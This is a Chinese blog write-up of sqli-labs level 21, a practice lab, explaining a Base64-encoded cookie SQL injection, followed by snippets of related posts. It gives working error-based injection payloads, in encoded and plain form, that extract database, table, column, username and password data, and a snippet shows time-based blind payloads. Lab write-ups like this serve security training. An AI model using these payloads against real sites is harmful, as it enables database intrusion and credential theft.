Sqlilabs-21

最新推荐文章于 2024-03-19 20:01:13 发布
最新推荐文章于 2024-03-19 20:01:13 发布
阅读量597 收藏
点赞数
分类专栏: sqlilabs
kaka
本文链接:https://blog.csdn.net/szlg510027010/article/details/107232633
版权

来到了第 21 关,看着 21 关,我知道,第一阶段快结束了,马上要到…啪…给我认真写博文…

ee9e02cb34d102314c475258b3bf39b.png

这一关卡的题目给内容貌似一点都不符合…还是得从 cookie 下手,但肯定不跟20 关一样,通过提交正常的数据,我们可以看到,COOKIE 长的有点不太一样…

5074585b001a805cf9f408ed1cc155d.png

Base64Decode 解码 YWRtaW4= 得到的结果是 admin,所以说后台将 COOKIE 进行了 Base64 的编码,所以构造 payload 时,应该在 cookie 类似于:[得先正确登入]

2da36f0877fb565404336916ea5281b.png

uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSwweDdlKSkj

uname=admin') and extractvalue(1,concat(0x7e,(select database()),0x7e))#

怎么猜单引号加括号,这里当你构造好 payload post 以后,会出现 BUG OFF…但是加了’)#就没有,这就才出来了。接下来直接上 payload:

–查表
uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB0YWJsZV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSBsaW1pdCAwLDEpLDB4N2UpKSM=

uname=admin') and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))#

–查列
uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBjb2x1bW5fbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIGFuZCB0YWJsZV9uYW1lID0gJ3VzZXJzJyBsaW1pdCAwLDEpLDB4N2UpKSM=

uname=admin') and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name = 'users' limit 0,1),0x7e))#

–查用户名
uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB1c2VybmFtZSBmcm9tIHVzZXJzIGxpbWl0IDAsMSksMHg3ZSkpIw==

uname=admin') and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e))#

–查密码
uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBwYXNzd29yZCBmcm9tIHVzZXJzIGxpbWl0IDAsMSksMHg3ZSkpIw==

uname=admin') and extractvalue(1,concat(0x7e,(select password from users limit 0,1),0x7e))#

bfe7ae47f4c333b24ba0131b10bbb6f.png

😄

CrAcKeR-1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析
Jay17的博客
08-03 2万+
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析 详细,超级详细
sql-labs 闯 21~25
qq_44663230的博客
08-29 1115
sql-labs 闯21~25
sqli-labs训练平台靶场详解!!!!
最新发布
ytdd66的博客
03-19 1529
下面选取几个具有代表性的卡,演示几种 SQL 注入漏洞利用方法。
sqlilabsmysqli_real_escape_string函数报错的问题解决。
snowman12138的博客
08-30 471
sqlilabsmysqli_real_escape_string函数报错的问题解决。
详细sqli-labs(1-65)通讲解
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
SQLI-LABS LESS 1-LESS 22
weixin_33946020的博客
06-10 199
SQLI-LABS LESS 1-LESS 22 0x01:前言 因为最近感觉手注快忘光了,所以玩一遍sqli-labs巩固一下。 sql注入,基于从服务器接收到的响应分类为 : ▲基于错误的SQL注入 ▲联合查询的类型 ▲堆查询注射 ▲SQL盲注 •基于布尔SQL盲注 •基于时间的SQL盲注 •基于报错的SQL盲注 0x02:环境搭建 基础环境为LAMP,...
mysqli mysql_real_escape_string,警告:mysqli_real_escape_string()期望参数1为mysqli,字符串给定...
weixin_32790385的博客
02-07 727
I have a secured area of my site where I can add/update/delete database entries. I am trying to update the script from mysql to mysqli. Everything works except for the "update" part. When I fill in...
sqli-labs第二十一详解(这次用sqlmap)
金 帛的博客
05-09 2453
SQL靶场第二十一答案详解,这次用sqlmap跑
sqli-labs大详解(完结)
热门推荐
hxhxhxhxx的博客
07-28 5万+
sqlilabs详解(不断更新)题目1-10Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)GET - Error based - Intiger based (基于错误的GET整型注入)Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)Less-4 GET - Error based - Double Quotes
sqlilabs21-37详细教程
黑白的博客
11-01 1227
声明 学习SQL注入,提高网路安全能力,其实大部分环境下,测试人员做的工作都截止到漏洞发现,简单回顾一下,漏洞发现的实质就是发现SQL语句的闭合方式,一般来讲都围绕着这几个符号 双引号 " 单引号 ’ 双引号括号 "( 单引号括号’( 实际运用过程如下,仔细观察服务器给的反馈,或者结合sleep函数进行使用 http://192.168.239.138:86/Less-9/?id=" --+ http://192.168.239.138:86/Less-9/?id=' --+ http://192.168.
Sqli-lab教程-史上最全详解(1-22通
qq_52364123的博客
04-10 7514
sql注入集合
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
Sqlilabs-26
KAKA的博客
07-14 2259
来到了 Sqlilabs 大魔王的第 26 卡… 来到页面就看到大大的,“你的所有空格和过滤符都属于我们“,这难得到机智的你吗? 在此说下常见的绕过方法有:(本来这应该在 25 卡就说的,忘了…) 双写绕过 大小写绕过 编码绕过,如:hex || URL 注释符绕过,如:/!select/ 替换:如 and 可替换为 && ,or 可替换为 || 空格的话我们可以 url 绕过:%a0 || %0b 等等,过滤字符我们可以用 and || or 替代 有了上述的神兵利器,那就很
Sqlilabs-18
KAKA的博客
07-09 858
来到了 18 18 同样也是在 UPDATE 上面做手脚,但是限制更加严格,不仅对 username 对 password 也做了 check_input 再看看后台 SQL 语句的构造: insert="INSERTINTO‘security‘.‘uagents‘(‘uagent‘,‘ipaddress‘,‘username‘)VALUES(′insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`)
Sqlilabs-6
KAKA的博客
07-06 849
第 6 跟第 5 一样,只不过是单引号换成了双引号而已 构造 ID 后,显示的内容为:You are in… http://sqlilabs/Less-6/?id=1 回显正常 http://sqlilabs/Less-6/?id=1' 回显正常 http://sqlilabs/Less-6/?id=1" 回显正常 http://sqlilabs/Less-6/?id=1"--+ 回显正常 因为正常时返回的内容为 You are in…无法从返回结果
Sqlilabs-17
KAKA的博客
07-07 835
来到了 17 ,从这开始刚学习需要借助源码来配合学习,本学习内容是 update 内容 从源码中可以看到,开发者的意图流程是: 首先查询用户名相匹配的 users 表中 数据,所以这里如果需要注入首先得有一个在数据库中已经有了的用户名,若是现实挖掘漏洞过程中这,如果可以,可以先自己先注册一个,这下在数据库中就躺着了一个可利用的用户名和密码…,没有的话可以盲猜,如一般都有 admin guest等等可以直接利用的… 继续往下看源码,你会发现 username 身上加了个check_input,转到
Sqlilabs-15
KAKA的博客
07-07 806
这一来到了第 15 ,值得注意的是,这一是布尔和时间盲注的结合,很好玩哦~ 因为有时间盲注,这里就直接上菜了,下面是几个例子 –查表 uname=admin' and if(ascii(substr((select group_concat(table_name) from information_schema.tables limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit –查列 uname=admin' a
Sqlilabs-Less38-
09-23
Sqlilabs-Less38是一个SQL注入的实验题目。在这个实验中,你需要通过注入恶意的SQL代码来获取敏感信息或者修改数据库中的数据。 在这个具体的实验中,通过输入一个id参数,我们可以在URL中进行注入。在第一步中,我们尝试闭合单引号来看是否存在注入点。在第二步中,我们尝试使用恶意的union select语句来获取数据库中的信息。在这个例子中,我们使用了"-2") union select 1,2,3 --"作为注入代码。通过这个注入代码,我们可以判断当前数据库的一些信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值